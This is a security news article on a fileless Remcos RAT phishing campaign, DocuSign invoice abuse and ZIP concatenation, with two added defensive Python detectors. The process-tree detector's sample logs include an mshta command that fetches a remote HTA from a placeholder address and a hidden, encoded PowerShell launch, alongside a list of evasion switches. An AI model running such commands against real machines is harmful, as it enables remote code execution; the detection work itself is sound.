Cybersecurity experts have identified a new phishing campaign distributing a fileless variant of the Remcos Remote Access Trojan (RAT).
This malware, originally marketed as a legitimate remote control tool, is being weaponized by threat actors to gain unauthorized access to victims’ systems and harvest sensitive data.
How it works
The attack begins with a phishing email, crafted to look like a purchase order, which carries a malicious Excel attachment. The document exploits CVE-2017-0199, a remote code execution vulnerability in Microsoft Office's handling of OLE objects that was patched in April 2017, so the chain only works against Office installations that are still unpatched. The exploit fetches an HTML Application (HTA) file from a remote server.
The HTA wraps its payload in layers of JavaScript, Visual Basic Script, and PowerShell to frustrate static inspection, and ultimately loads Remcos RAT directly into memory. Because the final payload is never written to disk, file-based scanners have nothing to examine; the HTA and the script host processes that run it are the visible artefacts.
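The one thing the fileless approach cannot hide is the process tree: Excel must spawn a script host, and the script host must spawn PowerShell. The following is an added example (not code from the article or from the researchers it cites) that hunts for that chain in process-creation telemetry. The events are constructed Sysmon Event ID 1 style records with hypothetical paths, PIDs and a TEST-NET address; the "evasion flag" list is a generic set of loader switches, not indicators taken from this campaign.

```python
"""Flag Office -> script host -> shell execution chains in process-creation logs.

Added example, not the article's or any vendor's code. Matching keys on the
process tree rather than on script content, which survives the JavaScript /
VBScript / PowerShell obfuscation layers the HTA uses.
"""

OFFICE_APPS = {"excel.exe", "winword.exe", "powerpnt.exe", "outlook.exe"}
SCRIPT_HOSTS = {"mshta.exe", "wscript.exe", "cscript.exe"}
SHELLS = {"powershell.exe", "pwsh.exe", "cmd.exe"}
# Generic loader switches (assumed indicators, not campaign-specific).
EVASION_FLAGS = ("-enc", "-encodedcommand", "-w hidden", "-windowstyle hidden", "-nop")

# Constructed sample events in Sysmon Event ID 1 shape (pid, ppid, image, cmdline).
# PIDs, file names and the 203.0.113.10 address are placeholders, not real IOCs.
SAMPLE_EVENTS = [
    {"pid": 100, "ppid": 1, "image": r"C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE",
     "cmdline": "EXCEL.EXE purchase_order.xlsx"},
    {"pid": 200, "ppid": 100, "image": r"C:\Windows\System32\mshta.exe",
     "cmdline": "mshta.exe http://203.0.113.10/order.hta"},
    {"pid": 300, "ppid": 200, "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell.exe -nop -w hidden -enc SQBFAFgA"},
    {"pid": 400, "ppid": 1, "image": r"C:\Windows\explorer.exe", "cmdline": "explorer.exe"},
    {"pid": 500, "ppid": 400, "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell.exe Get-Date"},
    {"pid": 600, "ppid": 100, "image": r"C:\Windows\System32\cmd.exe", "cmdline": "cmd.exe /c whoami"},
]


def image_name(path):
    """Lower-case file name of an image path, accepting either slash style."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def ancestry(events, pid):
    """Return [self, parent, grandparent, ...] image names for a process id.

    Stops at an unknown parent or on a cycle, so a corrupt log cannot loop forever.
    """
    by_pid = {e["pid"]: e for e in events}
    chain, seen = [], set()
    while pid in by_pid and pid not in seen:
        seen.add(pid)
        chain.append(image_name(by_pid[pid]["image"]))
        pid = by_pid[pid]["ppid"]
    return chain


def classify(events, event):
    """Return 'high', 'medium' or None for a single event.

    high   : shell reached via Office -> script host, or Office -> shell with loader flags
    medium : Office directly spawning a script host or a shell
    None   : no Office application anywhere in the ancestry
    """
    name = image_name(event["image"])
    if name not in SHELLS and name not in SCRIPT_HOSTS:
        return None
    ancestors = ancestry(events, event["pid"])[1:]
    if not any(a in OFFICE_APPS for a in ancestors):
        return None
    via_script_host = any(a in SCRIPT_HOSTS for a in ancestors)
    cmd = event["cmdline"].lower()
    flagged = any(flag in cmd for flag in EVASION_FLAGS)
    if name in SHELLS and (via_script_host or flagged):
        return "high"
    return "medium"


def find_suspicious(events):
    """Run classify() over every event and return the findings with their full chain."""
    findings = []
    for e in events:
        severity = classify(events, e)
        if severity:
            findings.append({"pid": e["pid"], "severity": severity,
                             "chain": " <- ".join(ancestry(events, e["pid"]))})
    return findings


if __name__ == "__main__":
    for f in find_suspicious(SAMPLE_EVENTS):
        print(f"{f['severity']:6} pid={f['pid']}  {f['chain']}")
```

Against the sample, the PowerShell process under mshta.exe under EXCEL.EXE is rated high; the mshta.exe and cmd.exe children of Excel are medium; the PowerShell launched from Explorer is ignored. In production the same logic applies to whichever EDR or Sysmon feed you have, with the parent relationships taken from the log rather than from a constructed list.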
Once active, Remcos RAT can collect system and user information, capture screen activity, enable the camera and microphone, and more, all under the control of a remote command-and-control server. To stay resident without an obvious binary on disk, the loader uses process hollowing: it starts a legitimate process, replaces its in-memory image with the Remcos payload, and resumes it, so the malicious code runs under a trusted process name.
In addition to this attack, researchers at Wallarm reported another phishing scheme in which attackers use DocuSign APIs to distribute fake invoices that appear legitimate. Because the messages are generated from genuine DocuSign accounts and sent through DocuSign's own infrastructure, they pass sender checks that would catch a spoofed domain, catching both users and security systems off guard.
Furthermore, a separate phishing tactic involving ZIP file concatenation has emerged. Two or more ZIP files are appended into a single file, and archive tools disagree about what such a file contains: some honour the first archive, others the last. A scanner or preview that reads one archive sees only the benign content, while the extractor the victim uses opens the other, letting malware slip through undetected.
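The disagreement comes from the ZIP format itself: the authoritative index (the central directory and its end record) sits at the end of the file, so end-anchored readers find the last archive, while readers that walk local file headers from the front find the first. The following added example (not code from the article or from any vendor) builds two small archives in memory, concatenates them, shows that Python's zipfile lists only the second, and then walks the file front-to-back to enumerate every embedded archive. File names and contents are constructed placeholders.

```python
"""Detect ZIP concatenation by comparing the front-to-back and end-anchored views.

Added example, not the article's code. Builds the sample archives in memory so it
runs offline; the member names and bytes are placeholders, not real lures.
"""
import io
import struct
import zipfile

LOCAL_SIG = b"PK\x03\x04"    # local file header
CENTRAL_SIG = b"PK\x01\x02"  # central directory entry
EOCD_SIG = b"PK\x05\x06"     # end of central directory record

# Constructed sample archives: a decoy and a hidden one.
BENIGN = {"invoice.pdf": b"%PDF-1.4 constructed placeholder, not a real PDF"}
HIDDEN = {"invoice.js": b"// constructed placeholder, not a real script"}


def make_zip(files):
    """Build a stored (uncompressed) ZIP archive in memory from {name: bytes}."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_STORED) as zf:
        for name, data in files.items():
            zf.writestr(name, data)
    return buf.getvalue()


def end_view(data):
    """What an end-anchored reader sees: Python's zipfile locates the EOCD from the tail."""
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        return zf.namelist()


def walk_archives(data):
    """Parse front-to-back and return one member-name list per embedded archive.

    A well-formed single ZIP yields one list; a concatenated file yields several.
    Entries that rely on data descriptors (flag bit 3) carry no size in the local
    header, so the walk cannot skip their data and raises instead of guessing.
    """
    archives, off = [], 0
    while data.startswith(LOCAL_SIG, off):
        names = []
        while data.startswith(LOCAL_SIG, off):
            (_sig, _ver, flags, _method, _time, _date, _crc, csize, _usize,
             fnlen, extralen) = struct.unpack_from("<4sHHHHHIIIHH", data, off)
            if flags & 0x08:
                raise ValueError("data descriptor in use; sizes not in local header")
            names.append(data[off + 30:off + 30 + fnlen].decode("utf-8"))
            off += 30 + fnlen + extralen + csize
        # Skip this archive's central directory entries.
        while data.startswith(CENTRAL_SIG, off):
            (fnlen, extralen, commentlen) = struct.unpack_from("<HHH", data, off + 28)
            off += 46 + fnlen + extralen + commentlen
        if not data.startswith(EOCD_SIG, off):
            raise ValueError("expected end-of-central-directory record at offset %d" % off)
        (commentlen,) = struct.unpack_from("<H", data, off + 20)
        off += 22 + commentlen
        archives.append(names)
    return archives


def analyze(data):
    """Summarise both views and flag the file when more than one archive is embedded."""
    archives = walk_archives(data)
    return {
        "front_view": archives[0] if archives else [],
        "end_view": end_view(data),
        "embedded_archives": len(archives),
        "concatenated": len(archives) > 1,
    }


if __name__ == "__main__":
    combined = make_zip(BENIGN) + make_zip(HIDDEN)
    print(analyze(combined))
```

On the concatenated sample, `front_view` is `['invoice.pdf']` while `end_view` is `['invoice.js']`, which is exactly the split a scanner-versus-extractor mismatch exploits. A mail gateway that extracts with one library and lets the endpoint extract with another should reject any attachment where `walk_archives` returns more than one list, or where the two views differ.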
These recent developments underscore the evolving complexity of phishing attacks and the need for advanced cybersecurity defences.
Source: The Hacker News